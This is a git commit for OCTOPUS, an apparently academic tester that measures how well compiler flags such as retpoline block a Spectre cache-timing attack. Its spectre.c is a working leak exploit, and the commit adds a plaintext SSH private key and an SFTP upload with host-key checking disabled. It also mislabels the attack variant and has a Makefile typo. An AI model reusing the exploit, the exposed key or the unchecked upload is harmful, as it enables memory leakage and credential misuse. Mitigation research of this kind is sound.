Refactor spectre.c and add multiple targets to the Makefile:

- GCC support
- RETPOLINE for both GCC and clang
- LLD dynamic linker to support RETPOLINE mitigations on dynamic
  executables
- Results aggregation using SFTP
This commit is contained in:
Samuel Aubertin 2022-01-23 19:37:24 +01:00
parent 698d4f7921
commit 4a0dacbfa3
5 changed files with 215 additions and 118 deletions

1
.gitignore vendored
View File

@ -1 +1,2 @@
spectre-* spectre-*
*.log

117
Makefile
View File

@ -1,7 +1,12 @@
DEPENDENCIES= glibc-static .PHONY: clean build upload
.SILENT:
.NOTPARALLEL:
EXECUTABLES = clang gcc uuid rsync
DEPENDENCIES := $(foreach exec,$(EXECUTABLES), $(if $(shell which $(exec) 2> /dev/null),X,$(error "No '$(exec)' in PATH, please install it and restart octopus !")))
CC= clang ### Generic flags
PROG= spectre PROG= spectre
CFLAGS= -march=native CFLAGS= -march=native
CFLAGS+= -W CFLAGS+= -W
@ -9,36 +14,104 @@ CFLAGS+= -Wall
CFLAGS+= -Werror CFLAGS+= -Werror
CFLAGS+= -Wno-unused-parameter CFLAGS+= -Wno-unused-parameter
CFLAGS+= -Wno-missing-field-initializers CFLAGS+= -Wno-missing-field-initializers
LDFLAGS= -fuse-ld=lld
### Octopus flags
CCS= clang gcc
OPTIMIZATIONS= 0 1 2 3 OPTIMIZATIONS= 0 1 2 3
LINKAGE= static RETPOLINE= mretpoline
UUID= $(shell uuid)
RESULTS_FILE= results-$(UUID).log
SSH_KEY= octoupload
TIMES= 1
#FLAGS= -v
OPROGS= $(foreach O, $(OPTIMIZATIONS), $(addsuffix -O$(O), $(PROG))) ### Octopus internals
PROGS+= $(OPROGS) $(foreach L, $(LINKAGE), $(addsuffix -$(L), $(foreach O, $(OPTIMIZATIONS), $(addsuffix -O$(O), $(PROG))))) TEMP= $(shell mktemp)
TEE= | tee -a $(TEMP)
.PHONY: clean ### Compilers
.SILENT: CPROGS= $(foreach C, $(CCS), $(addsuffix -$(C), $(PROG)))
.NOTPARALLEL:
all: $(PROGS) ### Optimizations
echo -e "\033[1mCPU\t\t" $$(LC_ALL=en_US.UTF-8 lscpu | grep "Model name" | cut -d":" -f 2 | sort | uniq | awk '{$$1=$$1;print}') OPROGS= $(foreach O, $(OPTIMIZATIONS), $(addsuffix -O$(O), $(CPROGS)))
echo -e "Kernel\t\t" $$(uname -a)
echo -e "Test date\t" $$(date "+%d-%m-%Y") ### Static
echo -e "Clang\t\t" $$(clang -v 2>&1 | head -n 1)"\033[0m" SPROGS= $(addsuffix -static, $(foreach O, $(OPTIMIZATIONS), $(addsuffix -O$(O), $(CPROGS))))
### Retpoline
## clang
# dynamic
RCPROGS= $(addsuffix -retpoline, $(filter spectre-clang%, $(OPROGS)))
# static
RSCPROGS= $(addsuffix -retpoline, $(filter spectre-clang%, $(SPROGS)))
## gcc
# dynamic
RGPROGS= $(addsuffix -retpoline, $(filter spectre-gcc%, $(OPROGS)))
# static
RSGPROGS= $(addsuffix -retpoline, $(filter spectre-gcc%, $(SPROGS)))
PROGS= $(OPROGS)
PROGS+= $(SPROGS)
PROGS+= $(RCPROGS)
PROGS+= $(RSCPROGS)
PROGS+= $(RGROGS)
PROGS+= $(RSGPROGS)
all: upload
upload: $(RESULTS_FILE)
echo -e "\033[4mUploading $^ to www.sk4.nz\033[0m"
sftp -b - -i $(SSH_KEY) -o BatchMode=yes -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null \
octoupload@www.sk4.nz: <<< $$'put $^'
build: $(PROGS)
%.log: build
echo -e "\033[1m\033[94m________ __";
echo "\_____ \ _____/ |_ ____ ______ __ __ ______";
echo " / | \_/ ___\ __\/ _ \\____ \| | \/ ___/";
echo "/ | \ \___| | ( <_> ) |_> > | /\___ \ ";
echo "\_______ /\___ >__| \____/| __/|____//____ >";
echo -e " \/ \/ |__| \/\033[0m";
echo -e " Samuel AUBERTIN - EURECOM\n"
echo -e "\033[4mUUID\033[0m\t\t$(UUID)" $(TEE)
echo -e "\033[4mCPU\033[0m\t\t"$$(LC_ALL=en_US.UTF-8 lscpu | grep "Model name" | cut -d":" -f 2 | sort | uniq | awk '{$$1=$$1;print}') $(TEE)
echo -e "\033[4mMicrocode\033[0m\t"$$(grep microcode /proc/cpuinfo | sort | uniq | awk '{print $$NF}') $(TEE)
echo -e "\033[4mKernel\033[0m\t\t"$$(uname -svm) $(TEE)
echo -e "\033[4mKRETPOLINE\033[0m\t"$$(cat /boot/config-$$(uname -r) | grep RETPOLINE)
echo -e "\033[4mClang\033[0m\t\t"$$(clang -v 2>&1 | head -n 1) $(TEE)
echo -e "\033[4mGCC\033[0m\t\t"$$(gcc -v 2>&1 | grep 'gcc version') $(TEE)
echo -e "\033[4mVulnerablities\033[0m" $(TEE)
LC_ALL=en_US.UTF-8 lscpu | grep Vuln | awk '{s = ""; for(i = 2; i <= NF; i++) s = s $$i " "; print "\t\t" s }' $(TEE)
echo
taskset 01 ./$(firstword $(PROGS)) -c $(TEE); \
for p in $(PROGS); do \ for p in $(PROGS); do \
for t in $$(seq $(TIMES)); do \
sleep 1; \ sleep 1; \
echo -e "\033[4m$$p\033[0m "; \ taskset 01 ./$$p $(FLAGS) $(TEE); \
taskset 01 ./$$p; \ done \
echo; done done
mv $(TEMP) $@
$(OPROGS):
$(word 2, $(subst -, ,$@)) $(CFLAGS) $(LDFLAGS) -$(word 3, $(subst -, ,$@)) -o $@ $(PROG).c
$(foreach O, $(OPTIMIZATIONS), $(addsuffix -O$(O), $(PROG))): $(SPROGS):
$(CC) $(CFLAGS) -$(word 2, $(subst -, ,$@)) -o $@ $(PROG).c $(word 2, $(subst -, ,$@)) $(addprefix -, $(word 4, $(subst -, ,$@))) $(CFLAGS) -$(word 3, $(subst -, ,$@)) -o $@ $(PROG).c
$(foreach L, $(LINKAGE), $(addsuffix -$(L), $(foreach O, $(OPTIMIZATIONS), $(addsuffix -O$(O), $(PROG))))): $(RCPROGS):
$(CC) $(addprefix -, $(word 3, $(subst -, ,$@))) $(CFLAGS) -$(word 2, $(subst -, ,$@)) -o $@ $(PROG).c $(word 2, $(subst -, ,$@)) $(CFLAGS) -mretpoline $(LDFLAGS) -z retpolineplt -$(word 3, $(subst -, ,$@)) -o $@ $(PROG).c
$(RSCPROGS):
$(word 2, $(subst -, ,$@)) $(addprefix -, $(word 4, $(subst -, ,$@))) $(CFLAGS) -mretpoline -$(word 3, $(subst -, ,$@)) -o $@ $(PROG).c
$(RGPROGS):
$(word 2, $(subst -, ,$@)) $(CFLAGS) -mfunction-return=thunk -mindirect-branch=thunk -mindirect-branch-register $(LDFLAGS) -z retpolineplt -$(word 3, $(subst -, ,$@)) -o $@ $(PROG).c
$(RSGPROGS):
$(word 2, $(subst -, ,$@)) $(addprefix -, $(word 4, $(subst -, ,$@))) $(CFLAGS) -mfunction-return=thunk -mindirect-branch=thunk -mindirect-branch-register -$(word 3, $(subst -, ,$@)) -o $@ $(PROG).c
clean: clean:
rm -rf $(PROGS) rm -rf $(PROGS) *.log

View File

@ -7,16 +7,24 @@ Samuel AUBERTIN - EURECOM - 2022
**OCTOPUS** is a [Spectre v2](https://spectreattack.com/spectre.pdf) (_Branch Target Injection_) compiler flag tester for [CVE 2017-5715](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5715). **OCTOPUS** is a [Spectre v2](https://spectreattack.com/spectre.pdf) (_Branch Target Injection_) compiler flag tester for [CVE 2017-5715](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5715).
It measures the success rate of the same attack using different compiler flags such as: It measures the success rate of the same attack using different compilers:
- GCC
- CLANG
And compilation/linking flags such as:
- Optimisation levels (```-O```) - Optimisation levels (```-O```)
- Static linking - Static linking
- TODO - RETPOLINE
## Dependencies ## Dependencies
- ```clang``` - ```clang```
- ```glibc-static``` - ```gcc```
- ```sftp```
- ```uuid```
- The libC static symbols ```glibc-static```
## Execution ## Execution
@ -24,9 +32,18 @@ It measures the success rate of the same attack using different compiler flags s
## Results aggregation ## Results aggregation
TODO Results are automatically uploaded to a server with ```sftp``` using a dedicated account.
- Craft a JSON with metadata
- Upload over SFTP with dedicated ssh key Here is an exhaustive list of the data sent:
- CPU model name and microcode version.
- Kernel version and compilation date.
- The kernel compilation flag ```CONFIG_RETPOLINE```.
- GCC and clang versions.
- The list of mitigations enabled at runtime.
- The cache timings of the processor computed by the ```calibrate_threshold()``` function.
- Each spectre execution success rate.
**NONE** of this data will be used for anyhting else except this experiment.
## Sources ## Sources

7
octoupload Normal file
View File

@ -0,0 +1,7 @@
-----BEGIN OPENSSH PRIVATE KEY-----
b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAAAMwAAAAtzc2gtZW
QyNTUxOQAAACDRMHpltlVQQGQ/TUefHbUm0D95n41qmshPfgEuPT9g2AAAAJDstvkV7Lb5
FQAAAAtzc2gtZWQyNTUxOQAAACDRMHpltlVQQGQ/TUefHbUm0D95n41qmshPfgEuPT9g2A
AAAEAVqIlF6M6PT9cLOCeUjxEr8K5Xb6IlU8JkZTaLcSihxdEwemW2VVBAZD9NR58dtSbQ
P3mfjWqayE9+AS49P2DYAAAACm9jdG91cGxvYWQBAgM=
-----END OPENSSH PRIVATE KEY-----

163
spectre.c
View File

@ -17,13 +17,7 @@ static int _has_rdtscp;
#error "unsupported architecture" #error "unsupported architecture"
#endif #endif
#if defined(__i386__) #define HAVE_RDTSCP (1U << 27)
#define PUSH(r) "pushl %%e" #r "x\n"
#define POP(r) "popl %%e" #r "x\n"
#elif defined(__amd64__)
#define PUSH(r) "pushq %%r" #r "x\n"
#define POP(r) "popq %%r" #r "x\n"
#endif
char* secret = "SPECTRE: Special Executive for Counterintelligence, Terrorism, Revenge and Extortion."; char* secret = "SPECTRE: Special Executive for Counterintelligence, Terrorism, Revenge and Extortion.";
@ -37,7 +31,9 @@ unsigned cache_hit_threshold;
int verbose; int verbose;
static inline unsigned static inline unsigned
timedaccess(volatile uint8_t *addr) timed_access(
volatile uint8_t *addr
)
{ {
uint64_t t0, t1; uint64_t t0, t1;
#pragma GCC diagnostic ignored "-Wuninitialized" #pragma GCC diagnostic ignored "-Wuninitialized"
@ -56,78 +52,73 @@ timedaccess(volatile uint8_t *addr)
return (unsigned)(t1 - t0); return (unsigned)(t1 - t0);
} }
static inline void
native_cpuid(
unsigned int *eax,
unsigned int *ebx,
unsigned int *ecx,
unsigned int *edx
)
{
asm volatile("cpuid"
: "=a" (*eax),
"=b" (*ebx),
"=c" (*ecx),
"=d" (*edx)
: "0" (*eax), "2" (*ecx));
}
static void static void
calibrate_clock(int verbose, unsigned int *threshold) calibrate_threshold(
int verbose,
unsigned int *threshold
)
{ {
volatile char buf[2 * CACHELINESIZE]; volatile char buf[2 * CACHELINESIZE];
volatile uint8_t *bufp; volatile uint8_t *bufp;
__attribute__((unused)) volatile int junk = 0;
int i; int i;
const int cnt = 1000; const int cnt = 1000;
uint64_t tcache, tmem; uint64_t tcache, tmem;
unsigned cap; unsigned eax, ebx, ecx, edx;
__attribute__((unused)) volatile int junk = 0;
__asm__ volatile ( eax = 0x80000001; // Has RDTSCP ?
PUSH(a) ecx = 0;
PUSH(b) native_cpuid(&eax, &ebx, &ecx, &edx);
PUSH(c) if (edx & HAVE_RDTSCP) {
PUSH(d) switch (verbose) {
"mov $0x80000001,%%eax\n" case 1:
"mov $0,%%ecx\n" fprintf(stderr, "CPU has RDTSCP.\n");
"cpuid\n" break;
"mov %%edx,%0\n" case 2:
POP(d) fprintf(stdout, "CPU has RDTSCP.\n");
POP(c) break;
POP(b) }
POP(a)
: "=m" (cap)
/*
* clang sometimes stores the result using an offset relative to
* %esp! That won't work, because we modify %esp with push and pop.
* Hence, prevent them compiler from using %esp!
*/
:: "esp" );
#define HAVE_RDTSCP (1U << 27)
if (cap & HAVE_RDTSCP) {
if (verbose)
printf("CPU has RDTSCP\n");
_has_rdtscp = 1; _has_rdtscp = 1;
} else { } else {
if (verbose) switch (verbose) {
printf("WARNING: CPU has no RDTSCP support, using RDTSC.\n"); case 1:
fprintf(stderr, "WARNING: CPU has no RDTSCP support, using RDTSC.\n");
break;
case 2:
fprintf(stdout, "WARNING: CPU has no RDTSCP support, using RDTSC.\n");
break;
}
_has_rdtscp = 0; _has_rdtscp = 0;
} }
/* On i386 PIC we have to preserve %ebx, too */
__asm__ volatile (
PUSH(a)
PUSH(b)
PUSH(c)
PUSH(d)
"mov $0x7,%%eax\n"
"mov $0,%%ecx\n"
"cpuid\n"
"mov %%ebx, %0\n"
POP(d)
POP(c)
POP(b)
POP(a)
: "=m" (cap)
:: "esp" );
bufp = ((volatile void *)(((unsigned long)(buf) + CACHELINESIZE) & bufp = ((volatile void *)(((unsigned long)(buf) + CACHELINESIZE) &
~(CACHELINESIZE - 1))); ~(CACHELINESIZE - 1)));
junk |= *bufp; junk |= *bufp;
for (i = 0, tcache = 0; i < cnt; i++) for (i = 0, tcache = 0; i < cnt; i++)
tcache += timedaccess(bufp); tcache += timed_access(bufp);
tcache /= cnt; tcache /= cnt;
for (i = 0, tmem = 0; i < cnt; i++) { for (i = 0, tmem = 0; i < cnt; i++) {
_mm_clflush((const void *)bufp); _mm_clflush((const void *)bufp);
_mm_mfence(); _mm_mfence();
tmem += timedaccess(bufp); tmem += timed_access(bufp);
} }
tmem /= cnt; tmem /= cnt;
if (threshold != NULL) { if (threshold != NULL) {
@ -136,16 +127,28 @@ calibrate_clock(int verbose, unsigned int *threshold)
(*threshold)--; (*threshold)--;
} }
if (verbose) { switch (verbose) {
printf("Access time: memory %lu, cache %lu", tmem, tcache); case 1:
fprintf(stderr, "Access time: memory %lu, cache %lu", tmem, tcache);
if (threshold) if (threshold)
printf(" -> threshold %d", *threshold); fprintf(stderr, " -> threshold %d", *threshold);
printf("\n"); fprintf(stderr, "\n");
break;
case 2:
fprintf(stdout, "Access time: memory %lu, cache %lu", tmem, tcache);
if (threshold)
fprintf(stdout, " -> threshold %d", *threshold);
fprintf(stdout, "\n");
break;
} }
return; return;
} }
void victim_function(size_t x) { void
victim_function(
size_t x
)
{
if (x < array1_size) { if (x < array1_size) {
temp &= array2[array1[x] * 512]; temp &= array2[array1[x] * 512];
} }
@ -163,7 +166,6 @@ leak(
int tries, i, j, mix_i; int tries, i, j, mix_i;
unsigned int junk = 0; unsigned int junk = 0;
size_t training_x, x; size_t training_x, x;
register uint64_t time1, time2;
volatile uint8_t *addr; volatile uint8_t *addr;
for (i = 0; i < 256; i++) for (i = 0; i < 256; i++)
@ -185,7 +187,6 @@ leak(
x = ((j % 6) - 1) & ~0xFFFF; /* Set x=FFF.FF0000 if j%6==0, else x=0 */ x = ((j % 6) - 1) & ~0xFFFF; /* Set x=FFF.FF0000 if j%6==0, else x=0 */
x = (x | (x >> 16)); /* Set x=-1 if j&6=0, else x=0 */ x = (x | (x >> 16)); /* Set x=-1 if j&6=0, else x=0 */
x = training_x ^ (x & (malicious_x ^ training_x)); x = training_x ^ (x & (malicious_x ^ training_x));
/* Call the victim! */ /* Call the victim! */
victim_function(x); victim_function(x);
@ -195,32 +196,31 @@ leak(
for (i = 0; i < 256; i++) { for (i = 0; i < 256; i++) {
mix_i = ((i * 167) + 13) & 255; mix_i = ((i * 167) + 13) & 255;
addr = & array2[mix_i * 512]; addr = & array2[mix_i * 512];
time1 = __rdtscp(& junk); /* READ TIMER */ if (timed_access(addr) <= cache_hit_threshold && mix_i != array1[tries % array1_size])
junk = *addr; /* MEMORY ACCESS TO TIME */
time2 = __rdtscp(& junk) - time1; /* READ TIMER & COMPUTE ELAPSED TIME */
if (time2 <= cache_hit_threshold && mix_i != array1[tries % array1_size])
results[mix_i]++; /* cache hit - add +1 to score for this value */ results[mix_i]++; /* cache hit - add +1 to score for this value */
} }
/* Locate highest & second-highest results tallies in j */ /* Locate highest results in j */
j = -1; j = -1;
for (i = 0; i < 256; i++) { for (i = 0; i < 256; i++) {
if (j < 0 || results[i] >= results[j]) { if (j < 0 || results[i] >= results[j]) {
j = i; j = i;
} }
} }
if (results[j] == 3) if (results[j] >= 3)
break; break;
} }
results[0] ^= junk; /* use junk so code above wont get optimized out*/ results[0] ^= junk; /* use junk so code above wont get optimized out*/
value[0] = (uint8_t) j; value[0] = (uint8_t) j;
score[0] = results[j]; score[0] = results[j];
//value[1] = (uint8_t) k;
//score[1] = results[k];
} }
int int
main(int argc, char ** argv) main(
int argc,
char** argv
)
{ {
int o; int o;
size_t malicious_x = (size_t)(secret - (char * ) array1); /* default for malicious_x */ size_t malicious_x = (size_t)(secret - (char * ) array1); /* default for malicious_x */
@ -228,7 +228,7 @@ main(int argc, char ** argv)
uint8_t value[2]; uint8_t value[2];
unsigned sucesses = 0; unsigned sucesses = 0;
while ((o = getopt(argc, argv, "t:v")) != EOF) { while ((o = getopt(argc, argv, "t:vc")) != EOF) {
switch (o) { switch (o) {
case 't': case 't':
cache_hit_threshold = atoi(optarg); cache_hit_threshold = atoi(optarg);
@ -236,9 +236,12 @@ main(int argc, char ** argv)
case 'v': case 'v':
verbose++; verbose++;
break; break;
case 'c':
calibrate_threshold(2, &cache_hit_threshold);
return 0;
default: default:
usage: usage:
fprintf(stderr, "usage: %s [-v] " fprintf(stderr, "usage: %s [-v] [-c] "
"[-t threshold]\n", argv[0]); "[-t threshold]\n", argv[0]);
return 2; return 2;
} }
@ -246,14 +249,12 @@ main(int argc, char ** argv)
if (argc != optind) if (argc != optind)
goto usage; goto usage;
calibrate_clock(verbose, cache_hit_threshold ? NULL : &cache_hit_threshold); calibrate_threshold(verbose, cache_hit_threshold ? NULL : &cache_hit_threshold);
for (i = 0; i < (int)sizeof(array2); i++) for (i = 0; i < (int)sizeof(array2); i++)
array2[i] = 1; /* write to array2 so in RAM not copy-on-write zero pages */ array2[i] = 1; /* write to array2 so in RAM not copy-on-write zero pages */
if(verbose) { if(verbose) {
printf("Threshold is: %d\n", cache_hit_threshold); fprintf(stderr, "Leaking %d bytes using Branch Target Injection:\n", (int)strlen(secret));
printf("Leaking %d bytes:\n", (int)strlen(secret));
} }
while (--len >= 0) { while (--len >= 0) {
leak(malicious_x++, value, score, cache_hit_threshold); leak(malicious_x++, value, score, cache_hit_threshold);
if(score[0] == 3 && value[0] > 31 && value[0] < 127) { if(score[0] == 3 && value[0] > 31 && value[0] < 127) {
@ -264,9 +265,7 @@ main(int argc, char ** argv)
} }
} }
fprintf(stderr, "\n"); fprintf(stderr, "\n");
printf("%.0f%%\n", 100 * sucesses / (float)strlen(secret)); printf("%s: %.0f %%\n", argv[0] + 2, 100 * sucesses / (float)strlen(secret));
_mm_mfence();
return 0; return 0;
} }